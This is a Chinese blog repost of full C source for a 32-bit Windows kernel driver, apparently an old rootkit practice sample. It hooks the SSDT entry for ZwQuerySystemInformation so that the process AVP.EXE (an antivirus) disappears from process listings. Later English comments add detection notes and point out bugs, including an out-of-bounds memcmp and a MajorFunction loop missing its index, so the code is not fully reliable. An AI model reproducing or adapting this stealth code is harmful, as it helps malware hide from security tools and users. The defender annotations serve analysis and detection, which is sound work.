
HOOK SSDT实现进程隐藏 - [病毒技术]


版权声明:转载时请以超链接形式标明文章原始出处和作者信息及本声明
http://romio64.blogbus.com/logs/6051228.html



/*
##################################################################
   HideProc.C

   Author   :robinh00d[F-13 Lab]
   Email    :cr4zyexpl0rer_at_gmail.com
   HomePage   :http://cr4zyexpl0rer.googlepages.com
   Last Updated :2006-03-23
   个人练习之作,都是几年前的老技术了
   基本上是copy别人的代码
   通过HOOK SSDT来实现对指定进程的隐藏
   windows自带的任务管理器以及PSAPI都是利用ZwQuerySystemInformation
   来实现进程的遍历
##################################################################
*/

#include "dbghelp.h"
#include "HideProc.h"
#include "ntddk.h"
#include "stdlib.h"

/* Local mirror of the kernel's SSDT header (KSERVICE_TABLE_DESCRIPTOR).
 * Only ServiceTableBase is used by this driver (see SYSTEMSERVICE below);
 * the other members are declared to keep the layout correct.
 * The 4-byte pointer/size fields make this a 32-bit-only layout.
 * Defender note: an SSDT entry that points outside the ntoskrnl image is
 * the classic integrity-check signal for this kind of hook. */
typedef struct ServiceDescriptorEntry {
     /* Array of service routine addresses, indexed by service number. */
     unsigned int   *ServiceTableBase;
     /* Per-service call counters; not used here. */
     unsigned int   *ServiceCounterTableBase;
     /* Number of entries in ServiceTableBase; not used here. */
     unsigned int   NumberOfServices;
     /* Per-service argument byte counts; not used here. */
     unsigned char *ParamTableBase;
} ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t ;

/* Imported from ntoskrnl; this symbol is only exported on 32-bit kernels,
 * and on x64 PatchGuard treats modification of the SSDT as a bugcheck
 * condition, so the technique below is limited to legacy 32-bit systems. */
__declspec(dllimport) ServiceDescriptorTableEntry_t KeServiceDescriptorTable ;

/* Resolve a Zw* stub to its SSDT slot. Relies on the 32-bit stub starting
 * with a "mov eax, <service index>" instruction, so the 32-bit value at
 * offset 1 of the stub is the index into ServiceTableBase. The expansion is
 * an lvalue and is used both to read (save) and write (hook/restore) the slot. */
#define SYSTEMSERVICE(_fun) KeServiceDescriptorTable.ServiceTableBase[*(PLONG) ((PUCHAR)_fun +1)]

/* Per-thread record that trails each _SYSTEM_PROCESSES entry in the
 * buffer returned for information class 5. Declared only so that the
 * Threads[] member of _SYSTEM_PROCESSES has the right size; none of
 * these fields is read by this driver. */
struct _SYSTEM_THREADS
{
LARGE_INTEGER    KernelTime;
LARGE_INTEGER    UserTime;
LARGE_INTEGER    CreateTime;
ULONG      WaitTime;
PVOID      StartAddress;
CLIENT_ID     ClientIs;      /* presumably ClientId; name kept as in the original */
KPRIORITY     Priority;
KPRIORITY     BasePriority;
ULONG      ContextSwitchCount;
ULONG      ThreadState;
KWAIT_REASON    WaitReason;
};

/* One process record in the buffer returned for information class 5.
 * The records form an in-buffer singly linked list: NextEntryDelta is the
 * byte offset from this record to the next one, and 0 marks the last
 * record (this is how NewZwQuerySystemInformation walks and unlinks them).
 * Only NextEntryDelta and ProcessName are read by this driver. */
struct _SYSTEM_PROCESSES
{
     /* Byte offset to the next record; 0 on the final record. */
     ULONG      NextEntryDelta;
     ULONG      ThreadCount;
     ULONG      Reserved[6];
     LARGE_INTEGER    CreateTime;
     LARGE_INTEGER    UserTime;
     LARGE_INTEGER    KernelTime;
     /* Image name of the process; converted to ANSI before comparison. */
     UNICODE_STRING    ProcessName;
     KPRIORITY     BasePriority;
     ULONG      ProcessId;
     ULONG      InheritedFromProcessId;
     ULONG      HandleCount;
     ULONG      Reserved2[2];
     VM_COUNTERS     VmCounters;
     IO_COUNTERS     IoCounters;
     /* Variable-length thread array (ThreadCount records) follows. */
     struct _SYSTEM_THREADS Threads[1];
} ;

/* Signature of ZwQuerySystemInformation, used for the saved original
 * entry and for casting the SSDT slot when it is written. */
typedef NTSTATUS
(*ZWQUERYSYSTEMINFORMATION)(ULONG SystemInformationCLass,
        PVOID SystemInformation,
        ULONG SystemInformationLength,
        PULONG ReturnLength
) ;

/* Original SSDT entry for ZwQuerySystemInformation, captured in
 * DriverEntry before the slot is overwritten. NewZwQuerySystemInformation
 * forwards to it and HidefileUnload writes it back into the table. */
ZWQUERYSYSTEMINFORMATION OriZwQuerySystemInformation ;

/* Prototype for the ntoskrnl export; it is only needed here as an address
 * for the SYSTEMSERVICE macro, which reads the service index out of the
 * stub rather than calling it. */
NTSYSAPI NTSTATUS NTAPI ZwQuerySystemInformation(IN ULONG SystemInformationClass,
              IN PVOID SystemInformation,
              IN ULONG SystemInformationLength,
              OUT PULONG ReturnLength) ;

/* Driver callbacks defined below. */
VOID HidefileUnload(IN PDRIVER_OBJECT DriverObject) ;
NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath) ;
NTSTATUS HidefileDispatch(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp) ;

/* Section placement: DriverEntry goes in the discardable INIT section and
 * the two callbacks are marked pageable. Note that the hook routine
 * NewZwQuerySystemInformation is deliberately not listed here, so it stays
 * non-paged (it runs in the context of arbitrary callers). */
#ifdef ALLOC_PRAGMA
#pragma alloc_text(INIT, DriverEntry)
#pragma alloc_text(PAGE, HidefileDispatch)
#pragma alloc_text(PAGE, HidefileUnload)
#endif // ALLOC_PRAGMA

NTSTATUS
HidefileDispatch(
      IN PDEVICE_OBJECT   DeviceObject,
      IN PIRP      Irp
      )
{
     /* Generic handler installed for every major function code by
      * DriverEntry: every IRP is completed immediately with
      * STATUS_SUCCESS and zero bytes of information. DeviceObject is
      * not consulted. */
     PIO_STATUS_BLOCK ioStatus = &Irp->IoStatus;

     ioStatus->Status = STATUS_SUCCESS;
     ioStatus->Information = 0;

     IoCompleteRequest(Irp, IO_NO_INCREMENT);

     return STATUS_SUCCESS ;
}

/* Driver unload: puts the saved original ZwQuerySystemInformation address
 * back into its SSDT slot so the system call is no longer redirected.
 * The write is bracketed by cli/sti, which only masks interrupts on the
 * current processor. */
VOID
HidefileUnload(
       IN PDRIVER_OBJECT   DriverObject
       )
{
// Restore the ZwQuerySystemInformation SSDT entry.
__asm cli
   (ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation)) = \
   OriZwQuerySystemInformation ;
__asm sti
  
}

/*
##################################################################
自定义的ZwQuerySystemInformation
过滤掉指定的进程
##################################################################
*/

/*
 * Replacement for ZwQuerySystemInformation installed in the SSDT.
 *
 * Calls the original service, then, when the caller asked for information
 * class 5 (SystemProcessInformation, the list Task Manager and PSAPI use),
 * walks the returned process records and unlinks every record whose image
 * name matches "AVP.EXE" by adjusting the previous record's NextEntryDelta.
 * All other classes and any failing call are passed through unchanged.
 *
 * Defender notes: the hook target is the AV process name, and the
 * DbgPrint string below is a static artifact of this sample. Because the
 * records are only unlinked in the returned buffer, an enumeration that
 * does not use this system call (or that compares the buffer's byte
 * length against the records actually reachable) is unaffected.
 */
NTSTATUS
NewZwQuerySystemInformation(ULONG SystemInformationCLass,
        PVOID SystemInformation,
        ULONG SystemInformationLength,
        PULONG ReturnLength
)
{
NTSTATUS ntStatus ;
ANSI_STRING ProcName ;

// Forward to the saved original entry first; the filtering below only
// post-processes a successful result.
ntStatus = OriZwQuerySystemInformation(SystemInformationCLass, \
           SystemInformation, \
           SystemInformationLength, \
           ReturnLength) ;

// Only filter when the original call succeeded.
if (NT_SUCCESS(ntStatus))
{
   // Information class 5 = SystemProcessInformation (process and thread list).
   if (5 == SystemInformationCLass)
   {
    struct _SYSTEM_PROCESSES *pCurrSP = (struct _SYSTEM_PROCESSES *)SystemInformation ;// record being examined
    struct _SYSTEM_PROCESSES *pPrevSP = NULL ;// previously visited record (NULL on the first one)
  
    // Walk the in-buffer list and unlink records with the target image name.

    while(pCurrSP)
    {
     // AllocateDestinationString == TRUE: ProcName.Buffer is pool-allocated
     // and released by RtlFreeAnsiString below. The return status is not
     // checked, so on failure ProcName is used uninitialized.
     RtlUnicodeStringToAnsiString(&ProcName, &pCurrSP->ProcessName, TRUE) ;
   
     if ((0 < ProcName.Length) && (255 > ProcName.Length))
     {
      // Match against the target name. NOTE: the compare length of 11
      // exceeds the 8-byte literal (7 characters plus the terminator), so
      // memcmp reads past the end of the literal and may also read past
      // ProcName.Buffer; behaviour is undefined.
      if (!memcmp(ProcName.Buffer, "AVP.EXE", 11))
      {
       DbgPrint("Can You Find The AVP? ;-)") ;

       // Unlink the current record from the list.
       if (pPrevSP)
       {
        if (pCurrSP->NextEntryDelta)// middle record: skip over it
        {
         pPrevSP->NextEntryDelta += pCurrSP->NextEntryDelta ;
        }
        else// last record: previous one becomes the tail
        {
         pPrevSP->NextEntryDelta = 0 ;
        }
       }
       else
       {
        if (pCurrSP->NextEntryDelta) // first record of the list
        {
         // Advances this function's local copy of the parameter only;
         // the caller's buffer pointer is not changed by this.
         (unsigned char *)SystemInformation += pCurrSP->NextEntryDelta ;
        }
        else // only record in the list
        {
         SystemInformation = NULL ;
        }
       }
      }
     }
     RtlFreeAnsiString(&ProcName);

     // Note: pPrevSP is advanced even when the current record was just
     // unlinked, so the next unlink adjusts the unlinked record's delta.
     pPrevSP = pCurrSP ;

     // Step to the next record; a zero delta terminates the walk.
     if (pCurrSP->NextEntryDelta)
     {
      (unsigned char *)pCurrSP += pCurrSP->NextEntryDelta ;
     }
     else
     {
      pCurrSP = NULL ;
     }
    }
   }
}
return ntStatus ;
}

/* Driver entry point: installs a catch-all IRP handler, registers the
 * unload routine, saves the current SSDT entry for ZwQuerySystemInformation
 * and overwrites it with NewZwQuerySystemInformation.
 *
 * Defender notes: after this returns, the SSDT slot for
 * ZwQuerySystemInformation points into this driver's image rather than
 * into ntoskrnl, which SSDT-integrity tools flag directly; the
 * "Driver Loaded Success!" debug string is a further static indicator.
 * No device object or symbolic link is created, so the driver exposes no
 * user-mode control interface. */
NTSTATUS
DriverEntry(
IN PDRIVER_OBJECT   DriverObject,
IN PUNICODE_STRING   RegistryPath
)
{
int      i = 0 ;

DbgPrint("Driver Loaded Success!") ;

// Point every major function code at the generic completion handler.
// NOTE(review): MajorFunction is an array, so an index ("[i]") appears to
// have been lost when this listing was transcribed; the loop also stops
// one short of the array's last entry.
for (; i < IRP_MJ_MAXIMUM_FUNCTION; i++)
{
   DriverObject->MajorFunction = HidefileDispatch ;
}

DriverObject->DriverUnload = HidefileUnload ;

// Save the original SSDT entry so it can be forwarded to and restored.
OriZwQuerySystemInformation = \
        (ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation)) ;
// Replace the entry. cli/sti only masks interrupts on the current CPU.
__asm cli
(ZWQUERYSYSTEMINFORMATION) (SYSTEMSERVICE(ZwQuerySystemInformation)) = \
                  NewZwQuerySystemInformation ;
__asm sti

return STATUS_SUCCESS ;
}








